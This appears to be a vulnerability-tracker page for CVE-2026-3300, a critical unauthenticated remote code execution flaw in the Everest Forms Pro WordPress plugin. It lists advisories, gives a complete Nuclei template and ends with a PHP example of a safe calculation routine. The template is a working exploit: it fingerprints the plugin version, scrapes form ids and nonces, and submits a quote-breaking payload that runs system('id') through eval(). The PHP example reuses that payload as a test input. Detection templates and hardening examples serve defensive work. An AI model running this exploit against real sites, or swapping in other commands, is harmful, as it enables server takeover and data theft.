| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-3300 | 31 Mar 2026 01:24 | – | attackerkb |
| CVE-2026-3300 | 31 Mar 2026 02:21 | – | circl |
| WordPress plugin Everest Forms Pro code injection vulnerability | 31 Mar 2026 00:00 | – | cnnvd |
| CVE-2026-3300 | 31 Mar 2026 01:24 | – | cve |
| CVE-2026-3300 Everest Forms Pro <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field | 31 Mar 2026 01:24 | – | cvelist |
| EUVD-2026-17275 | 31 Mar 2026 03:31 | – | euvd |
| Exploit for CVE-2026-3300 | 5 Jun 2026 14:19 | – | githubexploit |
| CVE-2026-3300 | 31 Mar 2026 02:15 | – | nvd |
| WordPress Everest Forms Pro plugin <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field vulnerability | 31 Mar 2026 06:57 | – | patchstack |
| PT-2026-29180 | 31 Mar 2026 00:00 | – | ptsecurity |
```yaml
id: CVE-2026-3300

info:
  name: Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of Everest Forms Pro plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cve
    - https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584
    - https://everestforms.net/changelog/
    - https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3300
    epss-score: 0.40992
    epss-percentile: 0.98487
    cwe-id: CWE-94
  metadata:
    max-request: 3
    verified: true
    product: everest-forms-pro
    vendor: wpeverest
    fofa-query: body="/wp-content/plugins/everest-forms-pro/"
  tags: cve,cve2026,wordpress,wp-plugin,everest-forms,rce,unauth,vkev

flow: http(1) && http(2) && http(3)

http:
  # Step 1: confirm the plugin is installed and read its version from readme.txt
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/everest-forms-pro/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Everest Forms")'
          - 'compare_versions(version, "<= 1.9.12")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        regex:
          - 'Stable tag:\s*([0-9.]+)'

  # Step 2: find a published page embedding a form, and pull the form id,
  # nonce, a text field id and a calculation (number) field id from it
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "evf-container","data-formid")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: form_id
        internal: true
        group: 1
        regex:
          - 'data-formid=(?:\\"|")([0-9]+)'

      - type: regex
        name: nonce
        internal: true
        group: 1
        regex:
          - 'name=(?:\\"|")_wpnonce[0-9]+(?:\\"|")\s+value=(?:\\"|")([a-f0-9]+)'

      - type: regex
        name: nonce_field
        internal: true
        group: 1
        regex:
          - 'name=(?:\\"|")(_wpnonce[0-9]+)(?:\\"|")\s+value='

      - type: regex
        name: text_field
        internal: true
        group: 1
        regex:
          - 'evf-field-text[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'

      - type: regex
        name: calc_field
        internal: true
        group: 1
        regex:
          - 'evf-field-number[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'

  # Step 3: submit the form through admin-ajax.php with the crafted text value
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=[0-9]+\([a-z_-]+\)'

      - type: word
        part: body
        words:
          - '"success":true'

    extractors:
      - type: regex
        group: 0
        regex:
          - 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)'
# digest: 4a0a00473045022002e890b4d8b04cb01544288ccf7a10b8c9778cac317a234b3a6dc6b410f6cadc022100dbf0305b675a6645001eca0537d37cd958832938ac2b5349cfb146fbabacb46e:922c64590222798bb761d5b6d8e72950
```
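The description above names the root cause: form values are concatenated into PHP source and passed to eval(), and sanitize_text_field() leaves quotes intact. The following is an added example, not code from Everest Forms Pro, Wordfence or the template author, that places a hypothetical reconstruction of that unsafe shape beside a hardened calculation routine which coerces every field value to a number and evaluates the formula with a small arithmetic parser instead of eval(). The function names, the `{field_x}` placeholder syntax and the field ids are assumptions made for illustration.

```php
<?php
// Added example (not Everest Forms Pro code). Function names, placeholder
// syntax and field ids are assumptions.

// Hypothetical reconstruction of the unsafe shape the description refers to:
// values are spliced into PHP source text and handed to eval(). A single quote
// in a value closes the string literal and the remainder is parsed as PHP;
// sanitize_text_field() leaves quotes and semicolons in place. For contrast
// only; it is never invoked below.
function unsafe_calculate(string $formula, array $fields): string
{
    $code = $formula;
    foreach ($fields as $id => $value) {
        $code = str_replace('{' . $id . '}', "'" . $value . "'", $code);
    }
    return (string) eval('return ' . $code . ';');
}

// Hardened shape: each field value is coerced to a plain decimal number before
// substitution, and the formula goes through a tiny arithmetic evaluator, so no
// user-controlled byte is ever interpreted as PHP.
function safe_calculate(string $formula, array $fields): float
{
    $expr = preg_replace_callback('/\{([A-Za-z0-9_]+)\}/', function (array $m) use ($fields): string {
        $raw = $fields[$m[1]] ?? '0';
        // Non-numeric input (including anything carrying quotes) becomes 0.
        $num = is_numeric($raw) ? (float) $raw : 0.0;
        return number_format($num, 10, '.', '');
    }, $formula);
    return evaluate_arithmetic($expr);
}

// Recursive-descent evaluator for + - * / and parentheses. Any other character
// is rejected up front, so identifiers, quotes or function calls cannot appear.
function evaluate_arithmetic(string $expr): float
{
    $clean = preg_replace('/\s+/', '', $expr);
    if ($clean === '' || !preg_match('#^[0-9.+\-*/()]+$#', $clean)) {
        throw new InvalidArgumentException('formula contains non-arithmetic characters');
    }
    preg_match_all('#\d+(?:\.\d+)?|[-+*/()]#', $clean, $m);
    $tokens = $m[0];
    if (implode('', $tokens) !== $clean) {
        throw new InvalidArgumentException('malformed number in formula');
    }
    $pos = 0;
    $value = parse_sum($tokens, $pos);
    if ($pos !== count($tokens)) {
        throw new InvalidArgumentException('unexpected token ' . $tokens[$pos]);
    }
    return $value;
}

function parse_sum(array $t, int &$p): float
{
    $v = parse_product($t, $p);
    while ($p < count($t) && ($t[$p] === '+' || $t[$p] === '-')) {
        $op = $t[$p++];
        $r = parse_product($t, $p);
        $v = ($op === '+') ? $v + $r : $v - $r;
    }
    return $v;
}

function parse_product(array $t, int &$p): float
{
    $v = parse_atom($t, $p);
    while ($p < count($t) && ($t[$p] === '*' || $t[$p] === '/')) {
        $op = $t[$p++];
        $r = parse_atom($t, $p);
        if ($op === '/' && $r == 0.0) {
            throw new DivisionByZeroError('division by zero in formula');
        }
        $v = ($op === '*') ? $v * $r : $v / $r;
    }
    return $v;
}

function parse_atom(array $t, int &$p): float
{
    if ($p >= count($t)) {
        throw new InvalidArgumentException('unexpected end of formula');
    }
    $tok = $t[$p++];
    if ($tok === '-') {          // unary minus
        return -parse_atom($t, $p);
    }
    if ($tok === '(') {          // parenthesised sub-expression
        $v = parse_sum($t, $p);
        if ($p >= count($t) || $t[$p++] !== ')') {
            throw new InvalidArgumentException('missing closing parenthesis');
        }
        return $v;
    }
    if (is_numeric($tok)) {
        return (float) $tok;
    }
    throw new InvalidArgumentException('unexpected token ' . $tok);
}

// Constructed inputs: a normal submission, then the quote-bearing value the
// template above sends. The hardened path prints 50 and 0 and never evaluates
// the injected text.
$formula = '{field_price} * {field_qty}';
echo safe_calculate($formula, ['field_price' => '12.5', 'field_qty' => '4']), "\n";
echo safe_calculate($formula, ['field_price' => "1'; system('id'); echo '", 'field_qty' => '4']), "\n";
```

The design point is that the hardened version has no code path in which a submitted string reaches the PHP interpreter: values are normalised to numbers, the remaining formula is whitelisted to digits and arithmetic symbols, and evaluation is done by a parser whose grammar has no notion of identifiers or strings. Escaping quotes inside an eval() string would be a weaker fix, since any missed context character reopens the same problem.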